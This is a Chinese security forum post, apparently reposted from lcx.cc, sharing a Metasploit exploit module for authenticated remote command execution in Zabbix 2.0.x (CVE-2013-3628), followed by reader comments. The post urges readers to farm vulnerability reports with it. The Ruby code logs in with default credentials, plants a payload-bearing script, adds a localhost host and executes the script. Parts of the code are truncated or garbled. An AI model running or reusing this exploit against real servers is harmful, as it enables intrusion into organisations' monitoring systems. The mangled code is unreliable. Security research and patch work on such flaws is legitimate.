Zabbix Authenticated Remote Command Execution, zabbix远程命令执行

zabbix 远程命令执行。

妈妈说再也不担心wb不够了

http://www.wooyun.org/searchbug.php?q=Zabbix+

刷起来哈哈

#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4  'Zabbix Authenticated Remote Command Execution',
      'Description'    => %q{
      ZABBIX allows an administrator to create scripts that will be run on hosts.
       An authenticated attacker can create a script containing a payload, then a host
       with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host.

      This module was tested againt Zabbix v2.0.9.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry ' # Discovery / msf module
         ],
      'References'     =>
        [
          ['CVE', '2013-3628'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
         ],
      'Payload'        =>
      {
        'Compat'     =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic perl ruby bash telnet python',
        }
      },
      'Platform'       => ['unix', 'linux'],
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget'  => 0
    ))

    register_options(
    [
      OptString.new('USERNAME', [ true, "Username to authenticate with", 'Admin']),
       OptString.new('PASSWORD', [ true, "Password to authenticate with", 'zabbix']),
       OptString.new('TARGETURI', [ true, "The URI of the Zabbix installation", '/zabbix/'])
     ], self.class)
  end

  def check
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/index.php")
    })

    if !init or init.code != 200
      print_error("Could not connect to server")
      return Exploit::CheckCode::Unknown
    end

    if init.body =~ /Zabbix (2.0.(d)) Copyright/
      if $1 >= "2.0.0" and $1  'POST',
      'uri' => '/zabbix/',
      'data' => 'request=&name='  'GET',
      'uri' => normalize_uri(target_uri.path, '/dashboard.php'),
      'cookie' => sess
    })

    if !dash or dash.code != 200
      fail_with("Dashboard failed")
    end

    sid = ''
    dash.body.each_line do |line|
      if line =~ /&sid=(.{16})">/
        sid = $1
        break
      end
    end

    if sid == ''
      fail_with("Could not get sid")
    end

    script_title = rand_text_alpha(18)
    post = {
      'sid' => sid,
      'form_refresh' => 3,
      'form' => 'Create+script',
      'name' => script_title,
      'type' => 0,
      'execute_on' => 1,
      'command' => payload.encoded,
      'commandipmi' => '',
      'description' => '',
      'usrgrpid' => 0,
      'groupid' => 0,
      'access' => 2,
      'save' => 'Save'
    }

    resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/scripts.php'),
      'vars_post' => post,
      'cookie' => sess
    })

    if !resp or resp.code != 200
      fail_with("Error creating script")
    end

    script_id = ''
    if resp.body =~ /scriptid=(d{1,8})&sid=#{sid}">#{script_title}/
      script_id = $1
    else
      fail_with("Could not get the script id")
    end

    host = rand_text_alpha(18)
    post = {
      'sid' => sid,
      'form_refresh' => 1,
      'form' => 'Create+host',
      'host' => host,
      'visiblename' => host,
      'groups_left' => 4,
      'newgroup' => '',
      'interfaces[1][isNew]' => true,
      'interfaces[1][interfaceid]' => 1,
      'interfaces[1][type]' => 1,
      'interfaces[1][ip]' => '127.0.0.1',
      'interfaces[1][dns]' => '',
      'interfaces[1][useip]' => 1,
      'interfaces[1][port]' => 10050,
      'mainInterfaces[1]' => 1,
      'proxy_hostid' => 0,
      'status' => 0,
      'ipmi_authtype' => -1,
      'ipmi_privilege' => 2,
      'ipmi_username' => '',
      'ipmi_password' => '',
      'macros[0][macro]' => '',
      'macros[0][value]' => '',
      'inventory_mode' => -1,
      'save' => 'Save',
      'groups[4]' => 4
    }

    resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/hosts.php'),
      'vars_post' => post,
      'cookie' => sess
    })

    if !resp or resp.code != 200
      fail_with("Error creating new host")
    end

    hostid = ''
    if resp.body =~ /hosts.php?form=update&hostid=(d{1,12})&groupid=(d)&sid=#{sid}">#{host}/
       hostid = $1
    else
      fail_with("Could not get the host id")
    end

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
       'cookie' => sess
    })
  end
end

[原文地址]

相关讨论：

1#

天朝城管 | 2013-11-07 11:48

好屌

2#

xsser (十根阳具有长短!!) | 2013-11-07 11:49

我操

3#

回复此人感谢

Black-Hole (我爱过你，然后你死了) | 2013-11-07 11:52

我靠..你屌了

4#

Sct7p | 2013-11-07 11:52

原出处 感谢

5#

小胖子 (我承认，我爱过VIP，我仅仅是爱过，因为他死了。) | 2013-11-07 11:54

我日。

6#

国士无双 (你这个是跟我闹呐？) | 2013-11-07 13:19

我靠

7#

J′aron (.~~~~~~~~~~~~~~~~~~~~~~~~) | 2013-11-07 13:22

屌爆啦！

8#

ACGT | 2013-11-07 15:07

上星期就爆出来了。。

9#

无敌L.t.H (:?门安天京北爱我) | 2013-11-07 15:26

然后等洞主上CCAV。

10#

马丁 (我快要饿死了!!!!) | 2013-11-07 15:36

...

11#

khjian | 2013-11-07 15:37

太吊了

12#

Sct7p | 2013-11-07 17:46

@ACGT 但是木有人刷洞啊。这个是可以秒的

13#

X,D | 2013-11-07 18:48

要先搞到权限的~！

要是有权限了，本身就可以执行任意命令。这洞有点坑爹。

14#

ACGT | 2013-11-07 21:29

@Sct7p 这种洞肯定走小厂商流程，打折以后也就两三个rank，还不够找洞+截图+描述花费的时间呢

15#

核攻击 (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2013-11-08 08:57

……

文章来源于lcx.cc:Zabbix Authenticated Remote Command Execution, zabbix远程命令执行

相关推荐: 科普：请问什么叫xss盲打？

请问什么叫xss盲打？ khjian | 2013-11-02 13:27 xss小白，老听人讲xss盲打，是什么意思啊？大牛给科普一下呗，谢谢了 [原文地址] 相关内容： 1# 小胖子 (我承认，我爱过VIP，我仅仅是爱过，因为他死了。) | 2013-11…